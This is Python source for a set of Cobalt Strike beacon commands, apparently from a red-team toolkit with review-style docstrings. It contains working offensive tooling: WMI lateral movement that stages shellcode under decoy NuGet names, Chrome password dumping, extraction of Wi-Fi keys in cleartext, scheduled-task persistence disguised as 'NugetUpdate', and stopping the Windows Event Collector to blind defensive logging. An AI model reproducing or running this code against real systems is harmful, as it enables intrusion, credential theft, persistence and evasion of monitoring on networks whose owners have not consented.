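def lateral_wmi_shellcode(bid, host, shellcode, user=None, password=None):
    r"""Stage a shellcode file on a remote host over SMB and launch it through WMI.

    Two files are copied from beacon ``bid`` into ``C:\WINDOWS`` on ``host``
    via the ``C$`` admin share: a native helper executable and the shellcode
    blob, both under randomised NuGet-looking names.  The helper is then
    started with ``wmic /node:<host> process call create`` and given the
    shellcode path as its only argument.

    Args:
        bid: Beacon id the uploads and the wmic call are tasked to.
        host: Remote hostname/IP; used both in the ``C$`` UNC path and as the
            wmic ``/node`` target.
        shellcode: Local path of the shellcode file to upload.
        user: Optional account for ``wmic /user:``.  Empty/None means the
            beacon's current token is used and no switch is emitted.
        password: Optional password for ``wmic /password:``; only emitted
            when non-empty.

    Notes:
        * Nothing removes the two staged files afterwards; the
          ``NugetPackage.*.exe`` / ``nuget.*.package`` artifacts remain in
          ``C:\WINDOWS`` on the target.
        * ``password`` travels on the command line of the beacon's shell, so
          it is visible in process listings and command-line logging on the
          source host.
        * ``user``/``password`` are double-quoted but not escaped; values
          containing ``"`` will break the command.
    """
    native_helper = utils.basedir('tools/native.exe')

    temp_relative = 'WINDOWS'
    temp_remote = r'\\{}\C$\{}'.format(host, temp_relative)  # UNC path used for the upload
    temp_local = r'C:\{}'.format(temp_relative)              # same directory as seen on the target

    native_helper_relative = 'NugetPackage.{}.exe'.format(helpers.randstr())
    native_helper_remote = r'{}\{}'.format(temp_remote, native_helper_relative)
    native_helper_local = r'{}\{}'.format(temp_local, native_helper_relative)

    shellcode_relative = r'nuget.{}.package'.format(helpers.randstr())
    shellcode_remote = r'{}\{}'.format(temp_remote, shellcode_relative)
    shellcode_local = r'{}\{}'.format(temp_local, shellcode_relative)

    # upload
    helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)

    # call it
    remote_command = '{} {}'.format(native_helper_local, shellcode_local)
    local_command = 'echo "{host}" & wmic /node:"{host}" '.format(host=host)
    # Emit only the credential switches that were actually supplied.  The
    # previous version formatted both whenever either was set, which passed
    # the literal string "None" as the missing user or password.
    if user:
        local_command += '/user:"{}" '.format(user)
    if password:
        local_command += '/password:"{}" '.format(password)
    local_command += 'process call create "{command}","{cwd}"'.format(
        command=remote_command, cwd=temp_local)
    aggressor.bshell(bid, local_command)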
def _(bid, *files):
    """Print one or more remote files through the beacon shell (a ``cat`` alike).

    Each path becomes a ``type <path>`` line and all lines go out as one
    shell tasking.  Paths are inserted verbatim, so names containing spaces
    must already be quoted by the caller.

    Args:
        bid: Beacon id to task.
        *files: Remote file paths.  With none given an error is reported via
            ``aggressor.berror`` and nothing is tasked.
    """
    if not files:
        aggressor.berror('cat: specify some files to cat')
        return

    script = '\n'.join(map('type {}'.format, files))
    aggressor.bshell(bid, script)
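def _(bid):
    r"""Upload the chrome-passwords helper to the user's home dir and dump its output to a file.

    Uploads ``tools/chrome-passwords.exe`` as ``<home>\temp.exe``, runs it via
    the beacon shell with stdout redirected to ``<home>\c`` and echoes a hint
    that ``grab-chrome-next`` should be run afterwards.  Both files are left
    in place by this function; whatever ``grab-chrome-next`` does with them is
    not visible here.

    Args:
        bid: Beacon id to task.

    Notes:
        The directory comes from ``helpers.guess_home`` — a guess, so the
        paths may be wrong for unusual profiles.  The dumped credentials sit
        in cleartext in ``<home>\c`` until something removes them.
    """
    # Previously a commented-out AppData\Local variant sat here; dropped.
    home = r'{}'.format(helpers.guess_home(bid))
    out_file = r'{}\c'.format(home)
    dest = r'{}\temp.exe'.format(home)
    helpers.upload_to(bid, utils.basedir('tools/chrome-passwords.exe'), dest)
    # out_file is deliberately not cmd_quote'd in the echo: it sits inside a
    # quoted message, not in a command position.
    aggressor.bshell(
        bid,
        r'{} > {} & echo "Chrome credentials ready at {}. Run grab-chrome-next"'
        .format(cmd_quote(dest), cmd_quote(out_file), out_file))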
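def _(bid, profile=None):
    r"""Dump saved Wi-Fi profiles, including cleartext keys, from the target.

    With ``profile`` set, a PowerShell snippet is run via ``bpowerpick`` that
    exports that one profile to ``$env:temp`` with ``key=clear``, prints the
    XML and deletes the export again.  Without ``profile`` the beacon shell
    simply runs ``netsh wlan show profiles name="*" key=clear``.

    Args:
        bid: Beacon id to task.
        profile: Optional Wi-Fi profile name.  It is substituted verbatim into
            a double-quoted argument and a wildcard path, so a name containing
            ``"`` or ``*`` breaks or widens the command.

    Notes:
        NOTE(review): the previous snippet located the export as
        ``$env:temp:\*name*.xml``; that token does not look like valid
        PowerShell and would stop the whole snippet from parsing (so the
        export itself would not run either).  It is replaced by a
        ``Get-ChildItem`` over an expandable string — confirm on a live
        target.  The variable was also renamed so the snippet no longer
        shadows PowerShell's automatic ``$PROFILE``.
    """
    if profile:
        command = helpers.code_string("""
            netsh wlan export profile name="{name}" folder="$env:temp" key=clear
            $exported = Get-ChildItem -Path "$env:temp\\*{name}*.xml"
            Get-Content $exported.FullName
            Remove-Item $exported.FullName
            """.format(name=profile))
        aggressor.bpowerpick(bid, command)
    else:
        aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear')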
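def _(bid, shellcode):
    r"""Persist a shellcode runner through a daily scheduled task named ``NugetUpdate``.

    Creates ``<appdata>\NuGet`` on the target, uploads the shellcode as
    ``nuget.package`` and ``tools/native_persist.exe`` as ``NugetManager.exe``
    beside it, then registers a ``schtasks`` daily task that runs the helper.

    Args:
        bid: Beacon id to task.
        shellcode: Local path of the shellcode file to upload.

    Notes:
        * The ``/tr`` path is now double-quoted.  ``helpers.guess_appdata``
          presumably returns a profile path, and one containing a space
          (``C:\Users\John Doe\...``) would otherwise be cut short by
          schtasks.
        * ``/sc daily`` is given without ``/st``, so schtasks chooses the
          start time; ``/f`` overwrites any existing ``NugetUpdate`` task.
        * The helper is assumed to read the sibling ``nuget.package`` — that
          is a property of ``native_persist.exe`` not visible here; confirm.
    """
    local_helper = utils.basedir('tools/native_persist.exe')

    appdata = helpers.guess_appdata(bid)
    nuget_dir = r'{}\NuGet'.format(appdata)
    remote_helper = r'{}\NugetManager.exe'.format(nuget_dir)
    aggressor.bmkdir(bid, nuget_dir)

    helpers.upload_to(bid, shellcode, r'{}\nuget.package'.format(nuget_dir))
    helpers.upload_to(bid, local_helper, remote_helper)

    # Quote the task action so a profile path with spaces survives schtasks.
    aggressor.bshell(
        bid, 'schtasks /create /f /tn NugetUpdate /sc daily /tr "{}"'.format(
            remote_helper))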
def _(bid):
    """Look up the beacon host's egress IP by querying OpenDNS for ``myip.opendns.com``.

    Runs an ``nslookup`` against ``resolver1.opendns.com`` through the beacon
    shell; that resolver answers with the address it saw the query come from.
    This is an outbound DNS query to a third-party resolver from the target.
    """
    wanip_query = 'nslookup myip.opendns.com. resolver1.opendns.com'
    aggressor.bshell(bid, wanip_query)
def _(bid):
    """List installed products with ``wmic product get Name,Version,Description``.

    NOTE(review): ``wmic product`` walks Win32_Product, which is widely
    reported to be slow and to trigger MSI consistency checks that write to
    the Application event log — noisy on a monitored host.  Behaviour is kept
    as is; a registry ``Uninstall``-key query is the usual quieter option.
    """
    inventory_query = 'wmic product get Name,Version,Description'
    aggressor.bshell(bid, inventory_query)
def _(bid, *args):
    """Join the given words with single spaces and run the result as one shell command.

    Args:
        bid: Beacon id to task.
        *args: Command words; concatenated verbatim with no quoting or
            escaping, so the caller controls the exact command line.
    """
    aggressor.bshell(bid, ' '.join(args))
def _(bid):
    """Liveness check: run ``echo pong`` on the beacon and let the output come back."""
    reply = 'echo pong'
    aggressor.bshell(bid, reply)
def _(bid, host):
    """Resolve ``host`` from the beacon with ``nslookup``.

    The name is wrapped in double quotes but not escaped; a value containing
    ``"`` or shell metacharacters changes the command that runs.
    """
    lookup = 'nslookup "{}"'.format(host)
    aggressor.bshell(bid, lookup)
def _(bid):
    """Report the beacon host's egress IP via an OpenDNS lookup, with a task note.

    Logs a line through ``btask`` and runs the ``nslookup`` with
    ``silent=True`` (presumably suppressing the command echo so only the task
    note shows).  Like the non-silent variant, this sends an outbound DNS
    query to a third-party resolver from the target.
    """
    aggressor.btask(bid, 'Tasked beacon to get WANIP via DNS')
    wanip_query = 'nslookup myip.opendns.com. resolver1.opendns.com'
    aggressor.bshell(bid, wanip_query, silent=True)
def _(bid):
    """List installed products via ``wmic product``, with a task note and silent tasking.

    NOTE(review): Win32_Product enumeration is widely reported to be slow and
    to trigger MSI consistency checks that log to the Application event log;
    behaviour is kept as is.
    """
    aggressor.btask(bid, 'Tasked beacon to get list of applications')
    inventory_query = 'wmic product get Name,Version,Description'
    aggressor.bshell(bid, inventory_query, silent=True)
 def finish(text):
     """Run ``text`` as a shell command on every beacon in the enclosing ``bids``.

     ``bids`` is a closure variable of the surrounding function (not visible
     here); the same command is tasked to each id in order.
     """
     for beacon in bids:
         aggressor.bshell(beacon, text)
def _(bid):
    """Stop the Windows Event Collector service (``wecsvc``) with ``sc stop``.

    Stopping wecsvc halts any event-forwarding subscriptions this host
    collects — a deliberate hit on defensive telemetry, and not a quiet one:
    the service stop is likely logged by the Service Control Manager itself,
    and the command needs sufficient rights on the beacon to succeed.
    """
    stop_collector = 'sc stop wecsvc'
    aggressor.bshell(bid, stop_collector)